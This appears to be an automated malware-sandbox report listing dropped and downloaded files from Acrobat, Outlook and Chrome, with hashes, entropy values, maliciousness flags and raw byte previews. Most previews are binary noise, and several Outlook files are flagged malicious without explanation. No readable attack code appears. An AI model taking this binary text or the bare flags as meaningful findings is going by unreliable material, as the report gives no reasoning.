                            Preview:06-10-2023 10:08:42:.---2---..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Starting NGL..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..06-10-2023 10:08:42:.Closing File..06-10-
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                            Category:dropped
                            Size (bytes):1419751
                            Entropy (8bit):7.976496077007677
                            Encrypted:false
                            SSDEEP:
                            MD5:1A39CAAE4C5F8AD2A98F0756FFCBA562
                            SHA1:279F2B503A0B10E257674D31532B01EA7DE0473F
                            SHA-256:57D198C7BDB9B002B8C9C1E1CCFABFE81C00FE0A1E30A237196A7C133237AA95
                            SHA-512:73D083E92FB59C92049AF8DC31A0AA2F38755453FFB161D18A1C4244747EE88B7A850F7951FC10F842AE65F6CC8F6164231DB6261777EC5379B337CB379BEF99
                            Malicious:false
                            Reputation:unknown
                            Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                            Category:dropped
                            Size (bytes):1407294
                            Entropy (8bit):7.97605879016224
                            Encrypted:false
                            SSDEEP:
                            MD5:1D64D25345DD73F100517644279994E6
                            SHA1:DE807F82098D469302955DCBE1A963CD6E887737
                            SHA-256:0A05C4CE0C4D8527D79A3C9CEE2A8B73475F53E18544622E4656C598BC814DFC
                            SHA-512:C0A37437F84B4895A7566E278046CFD50558AD84120CA0BD2EAD2259CA7A30BD67F0BDC4C043D73257773C607259A64B6F6AE4987C8B43BB47241F3C78EB9416
                            Malicious:false
                            Reputation:unknown
                            Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                            Category:dropped
                            Size (bytes):386528
                            Entropy (8bit):7.9736851559892425
                            Encrypted:false
                            SSDEEP:
                            MD5:5C48B0AD2FEF800949466AE872E1F1E2
                            SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                            SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                            SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                            Malicious:false
                            Reputation:unknown
                            Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                            Category:dropped
                            Size (bytes):758601
                            Entropy (8bit):7.98639316555857
                            Encrypted:false
                            SSDEEP:
                            MD5:59EE5E2FB56A099CAA8EDFD7AF821ED6
                            SHA1:F5DC4F876768D57B69EC894ADE0A66E813BFED92
                            SHA-256:E100AAAA4FB2B3D78E3B6475C3B48BE189C5A39F73CFC2D22423F2CE928D3E75
                            SHA-512:77A45C89F6019F92576D88AE67B59F9D6D36BA6FDC020419DAB55DBD8492BA97B3DAC18278EB0210F90758B3D643EA8DCF8EC2BD1481930A59B8BB515E7440FE
                            Malicious:false
                            Reputation:unknown
                            Preview:...........].s..R/c..D@..\......3Z.....E.,...d{.k.~..H3....-......A...<>n.......X..Dp..d......f.{...9&F..........R.UW-..^..zC.kjOUUMm...nW...Z.7.J.R.....=*.R........4..(WCMQ..u]]R...R......5.*..N)].....!.-.d]M....7.......i..rmP...6A.Z .=..~..$C-..}..Mo.T......:._'.S....r.9....6.....r....#...<U@.Iiu..X].T x.j....x...:q.....j]P3......[.5]|..7;.5....^..7(.E..@..s...2..}..j....*...t.5J...6Rf..%P{2T^$Y.V.O9.W...4...\ .5............Q.&j....h.+.u......W...4f]..s..(...:....`.<W_...z*Bs|tF5 NI4.zD..5...u...!........M.0.K%F....,.c.....>R6..i..Am.y.~5..S....M...^......F.&..V...Z.......i....b....V..,.UH"...W...5}A.....KUT..=6jZ.....B...Z...Y(..u...=....x,2..."._Cf.....b...z7..... r..#.r..L9....2...R,..J?&..p..~.....3.=z...w..m..U..%._#<....r.....B.z..G..D.:4m.Z.&.N......</..Dz+.......vn.....;Qhk....!dw...A......3..a..K...).Q.`t[..)].6.%@....v.g.%E>;Z...uz.L..6Ct..O.Eo.O.e..........J.J$...:....K..)......F.....ZWE...z..5..g.io...l2[.,m9X..f......5|:bj[.._R{gi...^
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):30
                            Entropy (8bit):1.2389205950315936
                            Encrypted:false
                            SSDEEP:
                            MD5:7B19344D103A81717081A2EF68F2CAE0
                            SHA1:F3310AE891D471B98A784385698E86CBBD99F549
                            SHA-256:A46443DC4FA89A9876270DC36EB5C3B72F070FD67395CB2EF3467B1A0FE5AB44
                            SHA-512:9B6BB04CC34180EF86D9783233F39E3A3CF7C3E23DA04A3897E466EAA00F6228F3D8D746F23B97317A81F09C0EB71A601F7E25C95BCE01910F02148BF12F1B9F
                            Malicious:false
                            Reputation:unknown
                            Preview:....M.........................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                            File Type:Composite Document File V2 Document, Cannot read section info
                            Category:dropped
                            Size (bytes):16384
                            Entropy (8bit):0.6696757781967329
                            Encrypted:false
                            SSDEEP:
                            MD5:50DDB8E4ACE06944DF167BE03736D683
                            SHA1:2518A8ECB47D984718B81CE0591C011C3E199587
                            SHA-256:6404555A7460C6D8E65291DF7B8A0140C080334CDB075CEEEF998BC10D3FFEFA
                            SHA-512:0D23DADFBD489A83EE5F4AB6943FE8A1B444E31A06069B1466624AD6D5C0818EA229301B437B80E5DC41062773B43E62C5691D4629A474CFD1251B183E4DA956
                            Malicious:true
                            Reputation:unknown
                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 21 16:24:16 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                            Category:dropped
                            Size (bytes):2673
                            Entropy (8bit):3.9898311565701956
                            Encrypted:false
                            SSDEEP:
                            MD5:E96BB8979EB53C7F728334B07CBC1ACF
                            SHA1:3323521E325303B4BC0717C20A74E7181B1F53CC
                            SHA-256:FC3E9DA9218395048F9B0673932052A139A0A2DF5F0BCF648F21054FE97B02BD
                            SHA-512:471D402BDD5B914E42C26F886B5E9B3ECF28814F3209E2C44EED5226E15B6A28884359AD25E6348D28358BC77AC23CC72A9AFA2FFE17941495CC403A18A03935
                            Malicious:false
                            Reputation:unknown
                            Preview:L..................F.@.. ...$+.,....C.f..#..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IUY.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VUY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VUY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VUY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VUY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 21 16:24:16 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                            Category:dropped
                            Size (bytes):2675
                            Entropy (8bit):4.007360445707077
                            Encrypted:false
                            SSDEEP:
                            MD5:69A658718B96EC5EB9A29034C440B6AC
                            SHA1:8EFFA48D3695FA850B284AF55196F375222EBBA6
                            SHA-256:BE061F803926BB367099680FABDE17805BA0CB465751BAC8EADDC8FEF6541E45
                            SHA-512:EBB1C240E9761807915BBD0DD600F5341E7142BDDB574C4971AE84B23FADB7602EB4983BE8559215FD73BFFE684F1A98261F41868F6AE74162890877A8578978
                            Malicious:false
                            Reputation:unknown
                            Preview:L..................F.@.. ...$+.,....7.Z..#..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IUY.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VUY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VUY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VUY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VUY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                            Category:dropped
                            Size (bytes):2689
                            Entropy (8bit):4.012420379176323
                            Encrypted:false
                            SSDEEP:
                            MD5:8AD623C87D7A97D2C52002A5F95B4C4B
                            SHA1:357B8DEE778E1BDEF98594FAC4451D018D3CC1B3
                            SHA-256:716E02973B2D0C176DD027376B3D90787567BCB641BF1AC21202BB82D64D9B5C
                            SHA-512:592538BDDD44921A70ADCBC06713F361091B8B9963FA059B628503855EBDCB6583040E268CB11175BF0BA271995D81294BA94D69FDBC02DA2DFA852731ED4D04
                            Malicious:false
                            Reputation:unknown
                            Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IUY.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VUY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VUY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VUY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 21 16:24:16 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                            Category:dropped
                            Size (bytes):2677
                            Entropy (8bit):4.004954603703224
                            Encrypted:false
                            SSDEEP:
                            MD5:432C7AF956651617B5E4CE360C1F869F
                            SHA1:08FAB7EA20EB196B7B20E0DEDE66E1CAFFBB7DDF
                            SHA-256:0D768612C6C0D9E9864937AE6772B3FC455D7F346F867CD3D32C71F69AC702A5
                            SHA-512:F61CBAE52AA9CC0B5BC97933466F9BD507647972466A45E13DA41CC497F9B2D9E8F20C2219E3D5A38C4213393EB78ABB5920E2DAFF948AFC2E0C38DE313BBB28
                            Malicious:false
                            Reputation:unknown
                            Preview:L..................F.@.. ...$+.,......T..#..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IUY.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VUY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VUY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VUY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VUY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 21 16:24:16 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                            Category:dropped
                            Size (bytes):2677
                            Entropy (8bit):3.993745859269812
                            Encrypted:false
                            SSDEEP:
                            MD5:321A4CBBBFC7EBDBEF97FA1FF7841998
                            SHA1:DFDD876BE217135C194E2150E61393C416BACE36
                            SHA-256:FE3E4DAA1C330242FB36727FAB87CD615CC1A51EEC802BC66E369E6875294736
                            SHA-512:954D9BAA61266700C059CED4B70D753FB75C3FD32B0AAF57F7633616CBB3D02F69647DAA2258648DE5167E0015115E1532CD8ED71D6B7CBB02312AE14CA48250
                            Malicious:false
                            Reputation:unknown
                            Preview:L..................F.@.. ...$+.,......`..#..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IUY.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VUY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VUY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VUY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VUY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 21 16:24:16 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                            Category:dropped
                            Size (bytes):2679
                            Entropy (8bit):4.001974278573544
                            Encrypted:false
                            SSDEEP:
                            MD5:93FB06D618D67B7D7E679904C36EE532
                            SHA1:DDC8C146D47051A53F70BC2EBA4CE09712C5B869
                            SHA-256:011C9D9BBCB4B112679182D76E692BB963ABFCD876DDEF0E9C9A2D1A03E7EFDB
                            SHA-512:A5A9563581FF0F593CD279A2703C60E422302D3A1CE1CFE2F17F01EF7777BC32C22AD1EC0CB3E8329E61CD7F458F16B566B301068258FF5DAD908ED34B980D9F
                            Malicious:false
                            Reputation:unknown
                            Preview:L..................F.@.. ...$+.,.....bK..#..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IUY.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VUY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VUY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VUY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VUY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                            File Type:Microsoft Outlook email folder (>=2003)
                            Category:dropped
                            Size (bytes):271360
                            Entropy (8bit):3.672035518458742
                            Encrypted:false
                            SSDEEP:
                            MD5:C5C91378C3EA2568267510C641D525E9
                            SHA1:D2A9D43F2292274E84C21D399AE21D671A02091B
                            SHA-256:C74472865E41F1E8EC8767C5C3F9F255E7939392FFC456EE660B1AFE52604B51
                            SHA-512:91FA9E7928EF903F647FB7CE634DEB0955A76D1A10976E6AD2818D75DF91964501A8607D57D6974D843858E986F992C19886844BE792399A3EBE682D64F6D857
                            Malicious:true
                            Reputation:unknown
                            Preview:!BDNk)-.SM......\...%...........A.......b................@...........@...@...................................@...........................................................................$.......D......................@........&......=...........................................................................................................................................................................................................................................................................................\...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):131072
                            Entropy (8bit):4.899414335368984
                            Encrypted:false
                            SSDEEP:
                            MD5:A9FF5D291AFB180EB6368211CF699028
                            SHA1:EE92DAF3DEE45A7B2210B337B7D164E645FD6817
                            SHA-256:CFE6B1D76F80044498E231A5A47525B51C90843158538C63A261C71361490891
                            SHA-512:8D0AD265CC08010FFC8B5B56AC613DEA0C5205CA4F852AFF81B76B969972DBA07CE52095145EF691B242FFA2F4AF74BBB1D598590F02029FF7AF20D57FAB58FA
                            Malicious:true
                            Reputation:unknown
                            Preview:b...C...i............C...#....................#.!BDNk)-.SM......\...%...........A.......b................@...........@...@...................................@...........................................................................$.......D......................@........&......=...........................................................................................................................................................................................................................................................................................\................C...#.......B............#.........................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:ASCII text, with no line terminators
                            Category:downloaded
                            Size (bytes):16
                            Entropy (8bit):3.875
                            Encrypted:false
                            SSDEEP:
                            MD5:D6B82198AF25D0139723AF9E44D3D23A
                            SHA1:D60DEEF1847EEEF1889803E9D3ADC7EDA220F544
                            SHA-256:A5C8CC49FA6649BE393EF22C2B31F1C46B671F8D763F783ED6D7B4E33669BDA3
                            SHA-512:B21BEE2EEC588308A9DC3C3C2405377704B39B08AA20CBA40BA6E6834E67CF6F2C086E0701F5B05AEE27E2677E9C5C24FF137318275ACA00DD063DF3DCC07D4D
                            Malicious:false
                            Reputation:unknown
                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAnZbUE0wAPESxIFDVd69_0=?alt=proto
                            Preview:CgkKBw1Xevf9GgA=
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:ASCII text, with no line terminators
                            Category:downloaded
                            Size (bytes):16
                            Entropy (8bit):3.875
                            Encrypted:false
                            SSDEEP:
                            MD5:344EB8D19F5C0A3435EF32FD9601F1FB
                            SHA1:E082EB1D89D91CC1A25A1D510268E576109DA07E
                            SHA-256:B44289B54959639FCA6A742F7CC2E2A5AF9C6E7B73C1B3E25227CA9790F3A587
                            SHA-512:EB9F1CD4A566192160371F4B182EE00180F6912333FFB79C537BD80635A6AFE6379FBE7BB74043D635BA65C9F4F956D9E97E516E24E516F2591192A36F866EAE
                            Malicious:false
                            Reputation:unknown
                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAlnneHGl-04FBIFDc5BTHo=?alt=proto
                            Preview:CgkKBw3OQUx6GgA=
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:ASCII text, with very long lines (50758)
                            Category:dropped
                            Size (bytes):51039
                            Entropy (8bit):5.247253437401007
                            Encrypted:false
                            SSDEEP:
                            MD5:67176C242E1BDC20603C878DEE836DF3
                            SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
                            SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
                            SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
                            Malicious:false
                            Reputation:unknown
                            Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:ASCII text, with very long lines (31803)
                            Category:dropped
                            Size (bytes):31842
                            Entropy (8bit):5.341705273940054
                            Encrypted:false
                            SSDEEP:
                            MD5:6470A918BA1FD4B8D0882DF0269DDB82
                            SHA1:97814FDAB64AA7D1B30F082F9EB272D4B1CE18A2
                            SHA-256:FD4CE12A87594281AFCEE9C73A40FE7ACC282BCC9E764FBB3AFA1481A96A091E
                            SHA-512:B8CB57985DBC03601BFC924EDADFEF62195A6BFDDA8543A08F565FDBB339ACEA3CFFE7DC4D4547D3F134965EBC9E39A3ACBA8E0635CCDD5F4D88F14BE72C163D
                            Malicious:false
                            Reputation:unknown
